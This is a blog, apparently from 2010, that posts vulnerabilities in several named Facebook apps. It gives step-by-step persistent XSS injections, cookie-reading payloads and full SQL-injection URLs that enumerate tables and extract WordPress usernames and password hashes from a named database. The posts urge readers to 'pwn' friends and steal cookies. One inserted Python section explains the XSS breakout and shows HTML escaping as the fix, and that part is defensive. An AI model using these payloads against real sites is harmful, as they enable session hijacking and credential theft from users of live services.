Wednesday, July 21, 2010

Facebook Music app Persistent XSS Vuln

About :
An independently managed application which allows Facebook users to place their music onto their profiles.
It has 547,534 monthly active users

LINK :http://www.facebook.com/?ref=logo#!/apps/application.php?id=2436915755&v=info&ref=appd

Another XSS vuln found :)

The steps are:
1.http://apps.facebook.com/stevenlu/?tab=index&display=add

2.http://apps.facebook.com/stevenlu/?tab=index&display=add&method=youtube&confirm&videoId=SgM3r8xKfGE

Once done, go on with your XSS scripts :D
for example:
"><script>alert("w00t")</script>


Here is a screenshot:

Tuesday, July 20, 2010

Facebook movies by Flixster Persistent XSS Exploit

About :
Rate movies and share what you saw or want to see with friends. Compare your movie taste. Take over 100,000 movie trivia quizzes.
Join over 40 Million people using Flixster on Facebook.
This application may contain content that is unsuitable for the general Facebook user. 3,446,811 monthly active users

A little more analysis of this app gave me a path to persistent XSS, which everyone loves the most :P
Step 1: http://apps.facebook.com/flixster/quiz/create :D
Do the basic steps and select "create quiz from scratch".

I tried the two parameters
"><script>alert("W00t")</script>
and
"><script>alert(document.cookie)</script>

which work very well :D
Hope you can pwn your friends now ;)
A few screenshots



Facebook movies by Flixster (search option) XSS vuln

About:
Rate movies and share what you saw or want to see with friends. Compare your movie taste. Take over 100,000 movie trivia quizzes.
Join over 40 Million people using Flixster on Facebook.
This application may contain content that is unsuitable for the general Facebook user. 3,446,811 monthly active users

I tried a few XSS scripts but sadly a few didn't work out... but then I tried this:

"><script>alert("w00t")</script>

So here are a few screenshots, which actually don't look like XSS ;) your views are necessary :D
http://img27.imageshack.us/img27/1774/xssed.png

and this is a normal search which did not give me any popup :P
http://img696.imageshack.us/img696/7798/testaog.png

Facebook Quiz Monster Persistent XSS Exploit

About Facebook Quiz Monster
It helps you create your own quiz Facebook application! Quiz Monster makes it simple, fun and easy!

Vuln found:
Persistent XSS vuln

Create your own quiz first and insert your XSS scripts in the options available there, for example:

"><script>alert("w00t")</script>


Once done, go and check your quiz.

Currently this application has 14,238,107 monthly active users... and so attackers can also try to steal their cookies (didn't try, but you can).

One such quiz is
http://apps.facebook.com/quizcreator/quizzes/714688/play


Here is a screenshot:

FB NetworkedBlogs App Persistent XSS Exploit

About NetworkedBlogs App
Promote your blog on Facebook and syndicate your feeds to your wall and fan pages. Join 450,000 other bloggers on the largest community of bloggers and blog lovers on Facebook.

Again, this app has 1,712,628 monthly active users.

Vuln:
Persistent XSS and HTML injection

Go to your FB account, add this app and create your blog... the problem is it has a character limit.

Here are a few screenshots

1. XSS Inj3ction:


2. HTML Inj3ction:
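Every post above uses the same payload, `"><script>alert("w00t")</script>`. The following is an added example (Python, written for this page, not code from the blog or from any of the apps) showing why the payload opens with `">`: the stored value is echoed inside a double-quoted attribute, so the `"` closes the value and the `>` closes the tag before the `<script>` starts. The two templates and the field name `title` are assumed stand-ins for whatever the quiz, video or blog fields actually render; the hardened renderer is ordinary attribute-context HTML escaping.

```python
# Added example, not from the FbAppz-BugReport posts: attribute-context
# breakout with the posted payload, and the output encoding that stops it.
import html
import re

# The exact payload used in the posts above.
PAYLOAD = '"><script>alert("w00t")</script>'

# Hypothetical templates standing in for an app page that echoes a stored
# field (quiz title, video id, blog name) into an attribute or a text node.
ATTR_TEMPLATE = '<input type="text" name="title" value="{value}">'
TEXT_TEMPLATE = '<h2>{value}</h2>'

SCRIPT_TAG = re.compile(r'<script\b', re.IGNORECASE)


def render_naive(template: str, value: str) -> str:
    """Vulnerable: the stored value is pasted into the HTML unchanged."""
    return template.format(value=value)


def render_escaped(template: str, value: str) -> str:
    """Hardened: HTML-escape the value. quote=True also turns " and ' into
    entities, which is what stops an attribute value from being closed early."""
    return template.format(value=html.escape(value, quote=True))


def contains_script_tag(markup: str) -> bool:
    """True if a real <script ...> start tag is present in the rendered markup."""
    return SCRIPT_TAG.search(markup) is not None


def attribute_value(markup: str) -> str:
    """What a browser would take as the value="..." attribute: everything up
    to the first double quote. With the naive render this is empty, because
    the payload's leading " terminated the attribute."""
    m = re.search(r'value="([^"]*)"', markup)
    return m.group(1) if m else ''


if __name__ == "__main__":
    for name, template in (("attribute", ATTR_TEMPLATE), ("text node", TEXT_TEMPLATE)):
        for label, render in (("naive", render_naive), ("escaped", render_escaped)):
            out = render(template, PAYLOAD)
            print(f"{name:9} {label:8} script tag present: {contains_script_tag(out)}")
            print("   ", out)
```

With the naive attribute render the markup becomes `<input ... value=""><script>alert("w00t")</script>">`: an empty attribute, a closed tag, then a live script element. The escaped render keeps the whole payload inside the attribute as `&quot;&gt;&lt;script&gt;...`. The text-node template shows that `">` is unnecessary there but `<` still has to be escaped.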

Facebook politicalaction app SQLi Exploit

The Facebook politicalaction app suffers from SQLi, which can reveal a lot of info to attackers.



Here are a few of the queries I am posting:

1.Getting Basic Info :
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2CCONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--+1

2.Getting the List of Tables:
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name),6,7,8,9,10+FROM+information_schema.tables+WHERE+table_schema+!=+0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

3.Getting the Columns
http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10+FROM+information_schema.columns+WHERE+table_schema+!=+0x6d7973716c+AND+table_schema+!=+0x696e666f726d6174696f6e5f736368656d61--+1

4.Getting WordPress user names and (hashed) passwords:

http://apps.facebook.com/politicalaction/issue.php?issueid=1+and+1%3D2+UNION+SELECT+1%2C2%2C3%2C4%2Cconcat(user_login,0x3a,user_pass),6,7,8,9,10+from+candukincaid.wp_users--+1

About FbAppz-BugReport

FbAppz-BugReport is a group where we research Facebook apps and report the bugs along with a PoC.